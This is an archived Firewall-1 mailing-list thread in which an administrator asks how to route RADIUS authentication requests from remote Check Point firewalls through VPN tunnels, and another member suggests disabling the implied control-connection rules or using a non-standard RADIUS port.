| |
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FW-1] Encrypted Radius requests from distributed FW's to centralized radius server
That's doable but with some cost.
You need to disable "Allow Firewall-1 Control Connections" option from the
global properties. That is because this allows the FW itself to send out Radius
request first. You can see this by looking at the implied rules. So, turn this
off and configure the policy to enable control connections manually. Configure
the VPN to include the connections from the FW itself. This should work as it
worked for me.
Another option you might consider, which I didn't try, is to configure your
Radius server and the firewall to use non standard Radius port so that we can
avoid getting filtered by the implied rule.
HTH,
Sun
Infonet Services
"Kalat, Andrew (ISS Atlanta)"
<[email protected]> To: [email protected]
Sent by: Mailing list for cc:
discussion of Firewall-1 Subject: [FW-1] Encrypted Radius requests from distributed FW's to
<[email protected] centralized radius server
kpoint.com>
02/28/2003 07:58 AM
Please respond to Mailing list for
discussion of Firewall-1
Hello,
Not to be a bother, but unfortunately I didn't hear anything on
this, so I am resending.
I'm hoping someone has had experience with this situation. It would seem
fairly common. Firewalls are Checkpoint NG, FP3, running on Solaris.
Radius is Steel Belted running on Windows.
Give 3 firewalls, A, B, and C. They are distributed around the internet,
connecting various networks over a VPN.
Radius server (raz) is authenticating remote users to all three
firewalls. This radius server (raz) resides behind firewall A.
Authentication requests from A,B, and C all travel to raz.
Here's the rub. The outbound radius request from B and C happen before
any VPN rules, and as such, they are traversing the net unencrypted.
This is not a problem for A, since RAZ is on a DMZ behind A. So, does
anyone know how to get B and C to use their established VPN's to A to
tunnel this authentication traffic?
Much appreciated to anyone who can provide insight or pointers. Take
care.
---------------------------------------------------------
Andrew J. Kalat, | Direct:MSS Senior Security Engineer | Main:Internet Security Systems, Inc. | E-Mail: [email protected]
6303 Barfield Road | <http://www.iss.net/>
Atlanta, GA 30328 | PGP key available.
=================================================
To set vacation, Out Of Office, or away messages,
send an email to [email protected]
in the BODY of the email add:
set fw-1-mailinglist nomail
=================================================
To unsubscribe from this mailing list,
please see the instructions at
http://www.checkpoint.com/services/mailing.html
=================================================
If you have any questions on how to change your
subscription options, email
[email protected]
=================================================
=================================================
To set vacation, Out Of Office, or away messages,
send an email to [email protected]
in the BODY of the email add:
set fw-1-mailinglist nomail
=================================================
To unsubscribe from this mailing list,
please see the instructions at
http://www.checkpoint.com/services/mailing.html
=================================================
If you have any questions on how to change your
subscription options, email
[email protected]
=================================================
|
|
